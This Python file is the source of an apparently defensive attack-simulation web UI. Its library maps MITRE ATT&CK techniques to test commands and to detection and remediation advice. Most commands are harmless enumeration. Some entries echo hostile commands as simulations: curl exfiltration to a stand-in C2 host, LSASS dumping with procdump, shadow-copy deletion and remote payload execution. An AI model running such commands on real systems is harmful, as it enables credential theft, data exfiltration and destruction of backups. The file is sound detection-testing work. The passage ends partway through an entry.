#!/usr/bin/env python3
"""
MERSAD - Kali Attacker Web UI (Standalone Edition)
A fully independent attack simulation interface for the Kali machine.
Works completely offline - no internet connection required.

Run: python3 kali_attacker_ui.py
Optional: python3 kali_attacker_ui.py --port 8080

Features:
- Embedded attack library (30+ attacks)
- SQLite database for persistent history
- Works 100% offline
- Optional update check from MERSAD website

Created by: Engineer Malek Shashaa
Email: malekshashaa1993@gmail.com
"""

VERSION = "1.2.0"
CREATOR_NAME = "Engineer Malek Shashaa"
CREATOR_EMAIL = "malekshashaa1993@gmail.com"
CREATOR = {"name": CREATOR_NAME, "email": CREATOR_EMAIL}

import argparse
import json
import os
import socket
import sqlite3
import threading
import time
import urllib.request
import urllib.error
import webbrowser
from datetime import datetime
from typing import Dict, List, Optional
from http.server import HTTPServer, BaseHTTPRequestHandler
import html

# ============================================================================
# EMBEDDED ATTACK LIBRARY - Works completely offline
# ============================================================================

EMBEDDED_ATTACKS = [
    {
        "id": "process_discovery",
        "name": "Process Discovery",
        "mitre_id": "T1057",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Enumerate running processes to identify security software",
        "commands": [
            "tasklist /v",
            "wmic process list brief",
            "powershell -c \"Get-Process | Select-Object Name, Id, Path | Format-Table\""
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-PLA (Process Lineage Analysis)"],
        "detection": "Monitor for unusual process enumeration commands. Alert on tasklist/wmic process queries from non-admin accounts.",
        "prevention": "Limit user access to process information. Implement application whitelisting.",
        "remediation": "Review which processes were enumerated. Check for follow-up reconnaissance or lateral movement."
    },
    {
        "id": "system_info_discovery",
        "name": "System Information Discovery",
        "mitre_id": "T1082",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Gather detailed system information",
        "commands": [
            "systeminfo",
            "hostname",
            "wmic os get caption,version,osarchitecture",
            "wmic computersystem get domain,manufacturer,model"
        ],
        "d3fend": ["D3-SDA (System Dependency Analysis)", "D3-ORA (Operational Risk Assessment)"],
        "detection": "Monitor systeminfo, wmic queries. Create baseline of normal admin activity.",
        "prevention": "Restrict WMI access to authorized accounts. Implement least privilege.",
        "remediation": "Assess what information was gathered. Rotate credentials if sensitive data exposed."
    },
    {
        "id": "user_discovery",
        "name": "Local User Discovery",
        "mitre_id": "T1087.001",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Enumerate local user accounts",
        "commands": [
            "net user",
            "net localgroup administrators",
            "wmic useraccount list brief",
            "powershell -c \"Get-LocalUser | Select-Object Name, Enabled\""
        ],
        "d3fend": ["D3-UAM (User Account Management)", "D3-ANET (Account Network Access)"],
        "detection": "Alert on net user/localgroup commands from non-admin users or unusual times.",
        "prevention": "Disable guest accounts. Implement account lockout policies. Use strong password policies.",
        "remediation": "Review user accounts for unauthorized additions. Disable unnecessary accounts."
    },
    {
        "id": "domain_discovery",
        "name": "Domain Trust Discovery",
        "mitre_id": "T1482",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "medium",
        "description": "Discover domain trusts and relationships",
        "commands": [
            "nltest /domain_trusts",
            "net group \"Domain Admins\" /domain 2>nul || echo Not in domain",
            "wmic ntdomain list brief"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-ANET (Account Network Access)"],
        "detection": "Monitor nltest commands and LDAP queries for trust enumeration.",
        "prevention": "Limit domain trust relationships. Implement SID filtering on trusts.",
        "remediation": "Review trust relationships. Implement selective authentication on trusts."
    },
    {
        "id": "network_discovery",
        "name": "Network Configuration Discovery",
        "mitre_id": "T1016",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Gather network configuration details",
        "commands": [
            "ipconfig /all",
            "arp -a",
            "netstat -ano",
            "route print"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-NM (Network Mapping)"],
        "detection": "Monitor network enumeration commands. Create baseline of normal network queries.",
        "prevention": "Segment networks. Implement host-based firewall rules.",
        "remediation": "Review network exposure. Consider network re-segmentation if compromised."
    },
    {
        "id": "security_software_discovery",
        "name": "Security Software Discovery",
        "mitre_id": "T1518.001",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "medium",
        "description": "Identify installed security products",
        "commands": [
            "wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct get displayname",
            "powershell -c \"Get-MpComputerStatus | Select-Object AMRunningMode, AntivirusEnabled\"",
            "sc query windefend"
        ],
        "d3fend": ["D3-AVS (Antivirus Scanning)", "D3-EFA (Endpoint Forensic Analysis)"],
        "detection": "Alert on WMI SecurityCenter queries. Monitor for service enumeration of security products.",
        "prevention": "Hide security product information from standard users. Use tamper protection.",
        "remediation": "Verify security products are running. Check for tampering attempts."
    },
    {
        "id": "powershell_execution",
        "name": "PowerShell Command Execution",
        "mitre_id": "T1059.001",
        "tactic": "Execution",
        "category": "Execution",
        "severity": "medium",
        "description": "Execute commands via PowerShell",
        "commands": [
            "powershell -c \"Write-Host 'EDR Test - PowerShell Execution'\"",
            "powershell -ep bypass -c \"[System.Net.Dns]::GetHostByName($env:COMPUTERNAME)\"",
            "powershell -c \"Get-ExecutionPolicy\""
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-SEA (Script Execution Analysis)"],
        "detection": "Enable PowerShell logging (ScriptBlock, Module, Transcription). Monitor for bypass flags.",
        "prevention": "Use Constrained Language Mode. Implement AppLocker/WDAC for PowerShell.",
        "remediation": "Review PowerShell logs. Identify executed scripts and their impact."
    },
    {
        "id": "encoded_powershell",
        "name": "Encoded PowerShell Command",
        "mitre_id": "T1027",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Execute base64 encoded PowerShell (benign test)",
        "commands": [
            "powershell -enc VwByAGkAdABlAC0ASABvAHMAdAAgACcARQBEAFIAIABUAGUAcwB0ACcA"
        ],
        "d3fend": ["D3-DA (Dynamic Analysis)", "D3-SEA (Script Execution Analysis)"],
        "detection": "Alert on -enc/-encodedcommand flags. Decode and analyze encoded content.",
        "prevention": "Block PowerShell encoded command execution via GPO. Use AMSI for content inspection.",
        "remediation": "Decode executed commands. Assess payload impact and clean any dropped files."
    },
    {
        "id": "wmi_execution",
        "name": "WMI Command Execution",
        "mitre_id": "T1047",
        "tactic": "Execution",
        "category": "Execution",
        "severity": "medium",
        "description": "Execute commands via WMI",
        "commands": [
            "wmic process call create \"cmd.exe /c echo WMI Execution Test\"",
            "wmic os get caption",
            "powershell -c \"Get-WmiObject -Class Win32_OperatingSystem\""
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-SMRA (System Management Request Analysis)"],
        "detection": "Monitor WMI process creation events. Enable WMI activity logging.",
        "prevention": "Restrict WMI access via firewall and DCOM permissions. Use WMI subscriptions sparingly.",
        "remediation": "Review WMI subscriptions. Remove unauthorized event consumers."
    },
    {
        "id": "cmd_execution",
        "name": "Windows Command Shell",
        "mitre_id": "T1059.003",
        "tactic": "Execution",
        "category": "Execution",
        "severity": "low",
        "description": "Execute commands via cmd.exe",
        "commands": [
            "cmd /c echo EDR Test Command",
            "cmd /c dir C:\\Windows\\System32",
            "cmd /c type C:\\Windows\\System32\\drivers\\etc\\hosts"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-PLA (Process Lineage Analysis)"],
        "detection": "Monitor cmd.exe spawns from unusual parents. Log command-line arguments.",
        "prevention": "Use AppLocker to control cmd.exe execution. Implement least privilege.",
        "remediation": "Review command history. Check for dropped files or modified configurations."
    },
    {
        "id": "scheduled_task_enum",
        "name": "Scheduled Task Enumeration",
        "mitre_id": "T1053.005",
        "tactic": "Discovery",
        "category": "Persistence",
        "severity": "medium",
        "description": "Enumerate scheduled tasks",
        "commands": [
            "schtasks /query /fo LIST",
            "powershell -c \"Get-ScheduledTask | Select-Object TaskName, State | Format-Table\""
        ],
        "d3fend": ["D3-JAN (Job Activity Normalization)", "D3-SDM (Scheduled Job Monitoring)"],
        "detection": "Monitor schtasks queries. Baseline normal scheduled task enumeration.",
        "prevention": "Restrict who can create/view scheduled tasks. Audit task creation.",
        "remediation": "Review all scheduled tasks. Remove unauthorized tasks."
    },
    {
        "id": "scheduled_task_create",
        "name": "Scheduled Task Creation (Simulated)",
        "mitre_id": "T1053.005",
        "tactic": "Persistence",
        "category": "Persistence",
        "severity": "high",
        "description": "Simulate scheduled task creation for persistence",
        "commands": [
            "echo [SIMULATION] Would create: schtasks /create /tn EDRTest /tr notepad.exe /sc daily",
            "schtasks /query /tn EDRTest 2>nul || echo Task does not exist - simulation only"
        ],
        "d3fend": ["D3-SDM (Scheduled Job Monitoring)", "D3-JAN (Job Activity Normalization)"],
        "detection": "Alert on schtasks /create commands. Monitor Task Scheduler event logs.",
        "prevention": "Restrict scheduled task creation to administrators. Enable task creation auditing.",
        "remediation": "Delete malicious scheduled tasks. Review task actions and triggers."
    },
    {
        "id": "registry_query",
        "name": "Registry Query",
        "mitre_id": "T1012",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Query Windows registry for system information",
        "commands": [
            "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
            "reg query HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
            "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Services\" /s /f \"ImagePath\" 2>nul | findstr ImagePath | head -5"
        ],
        "d3fend": ["D3-RM (Registry Monitoring)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Monitor registry queries to sensitive keys. Log reg.exe activity.",
        "prevention": "Restrict registry access permissions. Use registry auditing.",
        "remediation": "Compare registry against known-good baseline. Restore modified keys."
    },
    {
        "id": "registry_modification_sim",
        "name": "Registry Modification (Simulated)",
        "mitre_id": "T1547.001",
        "tactic": "Persistence",
        "category": "Persistence",
        "severity": "high",
        "description": "Simulate registry modification for persistence",
        "commands": [
            "echo [SIMULATION] Would add: reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v EDRTest /t REG_SZ /d notepad.exe",
            "reg query HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
        ],
        "d3fend": ["D3-RM (Registry Monitoring)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Alert on modifications to Run/RunOnce keys. Enable registry auditing.",
        "prevention": "Protect autorun registry keys. Implement application whitelisting.",
        "remediation": "Remove malicious registry entries. Restore from backup if needed."
    },
    {
        "id": "service_enumeration",
        "name": "Service Enumeration",
        "mitre_id": "T1007",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Enumerate Windows services",
        "commands": [
            "sc query type= service state= all",
            "wmic service list brief",
            "powershell -c \"Get-Service | Where-Object {$_.Status -eq 'Running'} | Select-Object Name, DisplayName\""
        ],
        "d3fend": ["D3-SDA (System Dependency Analysis)", "D3-SM (Service Monitoring)"],
        "detection": "Monitor for service enumeration from non-admin accounts.",
        "prevention": "Restrict service information access. Disable unnecessary services.",
        "remediation": "Review services for unauthorized additions. Stop and remove rogue services."
    },
    {
        "id": "lolbin_certutil",
        "name": "LOLBin - Certutil",
        "mitre_id": "T1105",
        "tactic": "Command and Control",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Use certutil (living-off-the-land binary)",
        "commands": [
            "certutil -hashfile C:\\Windows\\System32\\calc.exe SHA256",
            "echo [SIMULATION] Would download: certutil -urlcache -split -f http://example.com/file.txt"
        ],
        "d3fend": ["D3-NI (Network Isolation)", "D3-FA (File Analysis)"],
        "detection": "Alert on certutil with -urlcache or -decode flags. Monitor network connections.",
        "prevention": "Block or restrict certutil execution. Use application whitelisting.",
        "remediation": "Identify downloaded files. Remove malicious payloads and check for execution."
    },
    {
        "id": "lolbin_mshta",
        "name": "LOLBin - MSHTA",
        "mitre_id": "T1218.005",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Test MSHTA presence (no execution)",
        "commands": [
            "where mshta.exe",
            "echo [SIMULATION] MSHTA can execute HTA files - commonly abused"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-SEA (Script Execution Analysis)"],
        "detection": "Monitor mshta.exe execution. Alert on HTA file downloads.",
        "prevention": "Block mshta.exe via AppLocker/WDAC. Associate HTA with notepad.",
        "remediation": "Terminate mshta processes. Remove downloaded HTA files."
    },
    {
        "id": "lolbin_rundll32",
        "name": "LOLBin - Rundll32",
        "mitre_id": "T1218.011",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "medium",
        "description": "Use rundll32 for benign DLL call",
        "commands": [
            "rundll32.exe shell32.dll,Control_RunDLL",
            "echo [SIMULATION] Rundll32 can load arbitrary DLLs"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-MAC (Module Authentication)"],
        "detection": "Monitor rundll32 command-line arguments. Alert on unusual DLL loads.",
        "prevention": "Block unsigned DLL execution. Use application control policies.",
        "remediation": "Identify loaded DLLs. Remove malicious modules and quarantine."
    },
    {
        "id": "credential_access_sim",
        "name": "Credential Access Simulation",
        "mitre_id": "T1003",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "critical",
        "description": "Simulate credential access attempts (no actual dumping)",
        "commands": [
            "echo [SIMULATION] Mimikatz-like behavior would access LSASS",
            "tasklist /fi \"imagename eq lsass.exe\"",
            "echo [SIMULATION] procdump.exe -ma lsass.exe lsass.dmp"
        ],
        "d3fend": ["D3-CEM (Credential Encryption Monitoring)", "D3-PA (Process Analysis)"],
        "detection": "Monitor LSASS access. Enable Credential Guard alerts. Use honeytokens.",
        "prevention": "Enable Credential Guard. Disable WDigest. Use LSASS protection (RunAsPPL).",
        "remediation": "Force password reset for all accounts. Enable enhanced credential protection."
    },
    {
        "id": "ntds_access_sim",
        "name": "NTDS.dit Access Simulation",
        "mitre_id": "T1003.003",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "critical",
        "description": "Simulate NTDS.dit access attempt",
        "commands": [
            "echo [SIMULATION] vssadmin create shadow /for=C:",
            "echo [SIMULATION] copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit",
            "vssadmin list shadows 2>nul || echo VSS not available"
        ],
        "d3fend": ["D3-ACM (Access Control Monitoring)", "D3-FA (File Analysis)"],
        "detection": "Monitor VSS shadow copy creation. Alert on NTDS.dit file access.",
        "prevention": "Restrict DC access. Implement AD tiering model. Monitor backup operations.",
        "remediation": "Reset all domain passwords. Rotate KRBTGT key twice. Review DC logs."
    },
    {
        "id": "token_manipulation_sim",
        "name": "Token Manipulation Simulation",
        "mitre_id": "T1134",
        "tactic": "Privilege Escalation",
        "category": "Privilege Escalation",
        "severity": "high",
        "description": "Simulate token manipulation",
        "commands": [
            "whoami /all",
            "whoami /priv",
            "echo [SIMULATION] Token impersonation would occur here"
        ],
        "d3fend": ["D3-TM (Token Monitoring)", "D3-PA (Process Analysis)"],
        "detection": "Monitor for token manipulation APIs. Alert on privilege escalation patterns.",
        "prevention": "Remove unnecessary privileges. Implement least privilege access.",
        "remediation": "Terminate suspicious processes. Reset affected account credentials."
    },
    {
        "id": "uac_bypass_sim",
        "name": "UAC Bypass Simulation",
        "mitre_id": "T1548.002",
        "tactic": "Privilege Escalation",
        "category": "Privilege Escalation",
        "severity": "high",
        "description": "Simulate UAC bypass techniques",
        "commands": [
            "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA",
            "echo [SIMULATION] fodhelper.exe UAC bypass technique",
            "echo [SIMULATION] eventvwr.exe UAC bypass technique"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-ACM (Access Control Monitoring)"],
        "detection": "Monitor auto-elevate binaries. Alert on registry modifications for bypass.",
        "prevention": "Set UAC to Always Notify. Use local admin password solution (LAPS).",
        "remediation": "Review elevated processes. Clean registry modifications. Re-enable UAC protections."
    },
    {
        "id": "lateral_movement_sim",
        "name": "Lateral Movement Simulation",
        "mitre_id": "T1021.002",
        "tactic": "Lateral Movement",
        "category": "Lateral Movement",
        "severity": "high",
        "description": "Simulate SMB lateral movement",
        "commands": [
            "net view 2>nul || echo Network enumeration",
            "echo [SIMULATION] net use \\\\target\\C$ /user:domain\\admin password",
            "echo [SIMULATION] psexec \\\\target -s cmd.exe"
        ],
        "d3fend": ["D3-NI (Network Isolation)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor SMB connections. Alert on admin share access from workstations.",
        "prevention": "Disable admin shares. Implement network segmentation. Use PAWs for admin.",
        "remediation": "Isolate affected systems. Reset compromised credentials. Review lateral movement scope."
    },
    {
        "id": "rdp_discovery",
        "name": "RDP Configuration Discovery",
        "mitre_id": "T1021.001",
        "tactic": "Lateral Movement",
        "category": "Lateral Movement",
        "severity": "medium",
        "description": "Check RDP configuration",
        "commands": [
            "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections",
            "netstat -ano | findstr 3389",
            "powershell -c \"Get-ItemProperty 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server' -Name fDenyTSConnections\""
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-RAPA (Remote Access Port Analysis)"],
        "detection": "Monitor RDP connection attempts. Alert on RDP from unexpected sources.",
        "prevention": "Use NLA for RDP. Implement RDP Gateway. Restrict RDP access via firewall.",
        "remediation": "Review RDP logs. Disable RDP if not needed. Implement MFA for remote access."
    },
    {
        "id": "wmi_lateral_sim",
        "name": "WMI Lateral Movement Simulation",
        "mitre_id": "T1047",
        "tactic": "Lateral Movement",
        "category": "Lateral Movement",
        "severity": "high",
        "description": "Simulate WMI-based lateral movement",
        "commands": [
            "echo [SIMULATION] wmic /node:target process call create cmd.exe",
            "wmic os get caption"
        ],
        "d3fend": ["D3-SMRA (System Management Request Analysis)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor remote WMI connections. Alert on process creation via WMI.",
        "prevention": "Restrict remote WMI access. Disable WMI if not needed.",
        "remediation": "Review WMI subscriptions on all systems. Remove unauthorized remote access."
    },
    {
        "id": "file_collection",
        "name": "File Collection",
        "mitre_id": "T1005",
        "tactic": "Collection",
        "category": "Collection",
        "severity": "medium",
        "description": "Simulate local file collection",
        "commands": [
            "dir C:\\Users\\%USERNAME%\\Documents 2>nul | findstr /c:\".docx\" /c:\".xlsx\" /c:\".pdf\"",
            "echo [SIMULATION] Would collect sensitive files"
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-DAM (Data Access Monitoring)"],
        "detection": "Monitor mass file access. Alert on unusual file enumeration patterns.",
        "prevention": "Implement DLP solutions. Classify and protect sensitive data.",
        "remediation": "Identify accessed files. Assess data exposure. Notify affected parties."
    },
    {
        "id": "clipboard_data",
        "name": "Clipboard Data Access",
        "mitre_id": "T1115",
        "tactic": "Collection",
        "category": "Collection",
        "severity": "medium",
        "description": "Simulate clipboard data access",
        "commands": [
            "powershell -c \"Get-Clipboard\"",
            "echo [SIMULATION] Clipboard monitoring active"
        ],
        "d3fend": ["D3-DAM (Data Access Monitoring)", "D3-PA (Process Analysis)"],
        "detection": "Monitor clipboard access APIs. Alert on suspicious clipboard monitoring.",
        "prevention": "Clear clipboard regularly. Use clipboard managers with encryption.",
        "remediation": "Identify clipboard data accessed. Reset copied credentials."
    },
    {
        "id": "screen_capture_sim",
        "name": "Screen Capture Simulation",
        "mitre_id": "T1113",
        "tactic": "Collection",
        "category": "Collection",
        "severity": "medium",
        "description": "Simulate screen capture activity",
        "commands": [
            "echo [SIMULATION] Would capture screen using Win32 API",
            "powershell -c \"Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens\""
        ],
        "d3fend": ["D3-PA (Process Analysis)", "D3-DA (Dynamic Analysis)"],
        "detection": "Monitor screen capture APIs. Alert on unusual screenshot activity.",
        "prevention": "Use screen capture protection software. Implement watermarking.",
        "remediation": "Identify captured data. Assess exposure of sensitive information."
    },
    {
        "id": "exfil_sim",
        "name": "Data Exfiltration Simulation",
        "mitre_id": "T1041",
        "tactic": "Exfiltration",
        "category": "Exfiltration",
        "severity": "critical",
        "description": "Simulate data exfiltration over C2 channel",
        "commands": [
            "echo [SIMULATION] Would exfiltrate data via HTTP POST",
            "echo [SIMULATION] curl -X POST -d @data.txt http://c2server.com/upload"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-DEE (Data Exfiltration Detection)"],
        "detection": "Monitor outbound data transfers. Implement DLP at network boundary.",
        "prevention": "Block unauthorized cloud storage. Implement egress filtering.",
        "remediation": "Identify exfiltrated data. Block C2 channels. Notify affected parties."
    },
    {
        "id": "dns_exfil_sim",
        "name": "DNS Exfiltration Simulation",
        "mitre_id": "T1048.003",
        "tactic": "Exfiltration",
        "category": "Exfiltration",
        "severity": "high",
        "description": "Simulate DNS-based data exfiltration",
        "commands": [
            "echo [SIMULATION] nslookup data.evil.com",
            "nslookup localhost"
        ],
        "d3fend": ["D3-DNSA (DNS Analysis)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor DNS query patterns. Alert on high-entropy or long subdomain queries.",
        "prevention": "Use DNS filtering. Block direct DNS to external servers. Force DNS proxy.",
        "remediation": "Analyze DNS logs. Block malicious domains. Assess data exposure."
    },
    {
        "id": "file_encryption_sim",
        "name": "File Encryption Simulation",
        "mitre_id": "T1486",
        "tactic": "Impact",
        "category": "Impact",
        "severity": "critical",
        "description": "Simulate ransomware-like file operations (no actual encryption)",
        "commands": [
            "echo [SIMULATION] Ransomware would enumerate files here",
            "echo [SIMULATION] cipher /e would encrypt files",
            "dir C:\\Users\\%USERNAME%\\Documents 2>nul | findstr /c:\".docx\" /c:\".xlsx\" /c:\".pdf\""
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-BDR (Backup and Data Recovery)"],
        "detection": "Monitor mass file modifications. Alert on encryption API usage patterns.",
        "prevention": "Maintain offline backups. Implement application whitelisting. Use ransomware protection.",
        "remediation": "Isolate infected systems. Restore from clean backups. Report to authorities."
    },
    {
        "id": "shadow_copy_deletion_sim",
        "name": "Shadow Copy Deletion Simulation",
        "mitre_id": "T1490",
        "tactic": "Impact",
        "category": "Impact",
        "severity": "critical",
        "description": "Simulate shadow copy deletion (ransomware behavior)",
        "commands": [
            "echo [SIMULATION] vssadmin delete shadows /all /quiet",
            "echo [SIMULATION] wmic shadowcopy delete",
            "vssadmin list shadows"
        ],
        "d3fend": ["D3-BDR (Backup and Data Recovery)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Alert on vssadmin delete commands. Monitor Volume Shadow Copy service.",
        "prevention": "Protect VSS with restricted permissions. Maintain offsite backups.",
        "remediation": "Restore shadow copies if possible. Recover from external backups."
    },
    {
        "id": "firewall_discovery",
        "name": "Firewall Rules Discovery",
        "mitre_id": "T1016",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Enumerate Windows Firewall rules",
        "commands": [
            "netsh advfirewall show allprofiles",
            "netsh advfirewall firewall show rule name=all dir=in | findstr \"Rule Name\""
        ],
        "d3fend": ["D3-NM (Network Mapping)", "D3-FW (Firewall)"],
        "detection": "Monitor netsh firewall queries. Alert on firewall enumeration from non-admin.",
        "prevention": "Restrict netsh access. Hide firewall details from standard users.",
        "remediation": "Review firewall rules. Restore default deny policies if modified."
    },
    {
        "id": "dll_search_order_sim",
        "name": "DLL Search Order Hijacking Simulation",
        "mitre_id": "T1574.001",
        "tactic": "Persistence",
        "category": "Persistence",
        "severity": "high",
        "description": "Simulate DLL hijacking reconnaissance",
        "commands": [
            "echo [SIMULATION] Would place malicious DLL in application directory",
            "dir C:\\Windows\\System32\\*.dll | findstr /c:\".dll\" | head -10",
            "echo Common hijackable: VERSION.dll, CRYPTBASE.dll, WLDAP32.dll"
        ],
        "d3fend": ["D3-MAC (Module Authentication)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Monitor DLL loads from unusual locations. Use Sysmon for DLL tracking.",
        "prevention": "Use SafeDllSearchMode. Implement code signing requirements.",
        "remediation": "Remove malicious DLLs. Verify application integrity. Reinstall affected software."
    },
    {
        "id": "startup_folder_sim",
        "name": "Startup Folder Persistence Simulation",
        "mitre_id": "T1547.001",
        "tactic": "Persistence",
        "category": "Persistence",
        "severity": "medium",
        "description": "Simulate startup folder persistence",
        "commands": [
            "dir \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"",
            "dir \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"",
            "echo [SIMULATION] Would create shortcut in startup folder"
        ],
        "d3fend": ["D3-BA (Boot Activity)", "D3-FA (File Analysis)"],
        "detection": "Monitor startup folder changes. Alert on new files in startup locations.",
        "prevention": "Restrict write access to startup folders. Use application whitelisting.",
        "remediation": "Remove unauthorized startup items. Review all persistence mechanisms."
    },
    {
        "id": "phishing_simulation",
        "name": "Phishing Attachment Simulation",
        "mitre_id": "T1566.001",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "high",
        "description": "Simulate spearphishing attachment behavior",
        "commands": [
            "echo [SIMULATION] User opens malicious Office document",
            "echo [SIMULATION] Macro executes: powershell -ep bypass -c IEX(payload)",
            "powershell -c \"Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Office\\*\\Word\\Security' 2>$null\""
        ],
        "d3fend": ["D3-UA (User Training)", "D3-MA (Message Analysis)", "D3-SFA (Sender Filtering)"],
        "detection": "Monitor Office applications spawning suspicious child processes. Enable macro logging.",
        "prevention": "Block macros from internet. Deploy email filtering. User awareness training.",
        "remediation": "Isolate affected system. Check for dropped payloads. Reset user credentials."
    },
    {
        "id": "phishing_link_sim",
        "name": "Phishing Link Simulation",
        "mitre_id": "T1566.002",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "high",
        "description": "Simulate spearphishing link behavior",
        "commands": [
            "echo [SIMULATION] User clicks malicious link in email",
            "echo [SIMULATION] Browser downloads: malware.exe",
            "powershell -c \"Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings'\""
        ],
        "d3fend": ["D3-UA (User Training)", "D3-NTA (Network Traffic Analysis)", "D3-URL (URL Analysis)"],
        "detection": "Monitor browser downloads. Alert on executable downloads from email links.",
        "prevention": "URL filtering. Sandboxed browsing. User security training.",
        "remediation": "Block malicious URLs. Scan downloaded files. Reset browser settings."
    },
    {
        "id": "valid_accounts_domain",
        "name": "Valid Domain Accounts",
        "mitre_id": "T1078.002",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "high",
        "description": "Simulate use of compromised domain credentials",
        "commands": [
            "echo [SIMULATION] Attacker uses stolen domain credentials",
            "net user /domain 2>nul || echo Not domain joined",
            "whoami /all"
        ],
        "d3fend": ["D3-UAM (User Account Management)", "D3-AL (Authentication Logging)"],
        "detection": "Monitor logon events for unusual times/locations. Implement UEBA.",
        "prevention": "MFA everywhere. Privileged access workstations. Just-in-time access.",
        "remediation": "Force password reset. Review account activity. Enable MFA."
    },
    {
        "id": "valid_accounts_local",
        "name": "Valid Local Accounts",
        "mitre_id": "T1078.003",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "medium",
        "description": "Simulate use of compromised local accounts",
        "commands": [
            "echo [SIMULATION] Attacker uses local admin credentials",
            "net user",
            "net localgroup administrators"
        ],
        "d3fend": ["D3-UAM (User Account Management)", "D3-AL (Authentication Logging)"],
        "detection": "Monitor local account logons. Alert on disabled account usage.",
        "prevention": "LAPS for local admin. Disable default admin. Strong password policy.",
        "remediation": "Reset local admin passwords. Review local account usage."
    },
    {
        "id": "valid_accounts_cloud",
        "name": "Valid Cloud Accounts",
        "mitre_id": "T1078.004",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "critical",
        "description": "Simulate compromised cloud account access",
        "commands": [
            "echo [SIMULATION] Attacker accesses cloud resources with stolen credentials",
            "echo [SIMULATION] Azure/AWS/GCP console access",
            "powershell -c \"Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Office\\*\\Common\\Identity' 2>$null\""
        ],
        "d3fend": ["D3-AL (Authentication Logging)", "D3-MFA (Multi-factor Authentication)"],
        "detection": "Monitor cloud sign-ins. Alert on impossible travel. Check for new device logins.",
        "prevention": "Enforce MFA. Conditional access policies. Cloud access security broker.",
        "remediation": "Revoke cloud sessions. Reset credentials. Review cloud audit logs."
    },
    {
        "id": "external_remote_services",
        "name": "External Remote Services",
        "mitre_id": "T1133",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "high",
        "description": "Simulate VPN/RDP external access abuse",
        "commands": [
            "echo [SIMULATION] Attacker uses compromised VPN credentials",
            "netstat -ano | findstr :3389",
            "netstat -ano | findstr :443"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-MFA (Multi-factor Authentication)"],
        "detection": "Monitor VPN/RDP logins from unusual locations. Geo-blocking.",
        "prevention": "MFA for all remote access. Network segmentation. VPN split tunneling disabled.",
        "remediation": "Terminate suspicious sessions. Rotate VPN credentials. Review access logs."
    },
    {
        "id": "supply_chain_sim",
        "name": "Supply Chain Compromise Simulation",
        "mitre_id": "T1195.002",
        "tactic": "Initial Access",
        "category": "Initial Access",
        "severity": "critical",
        "description": "Simulate software supply chain attack",
        "commands": [
            "echo [SIMULATION] Compromised software update deployed",
            "echo [SIMULATION] SolarWinds/Kaseya style attack",
            "wmic product get name,version | findstr /i update"
        ],
        "d3fend": ["D3-SCI (Software Configuration Inspection)", "D3-SWV (Software Verification)"],
        "detection": "Monitor software updates. Verify digital signatures. Hash verification.",
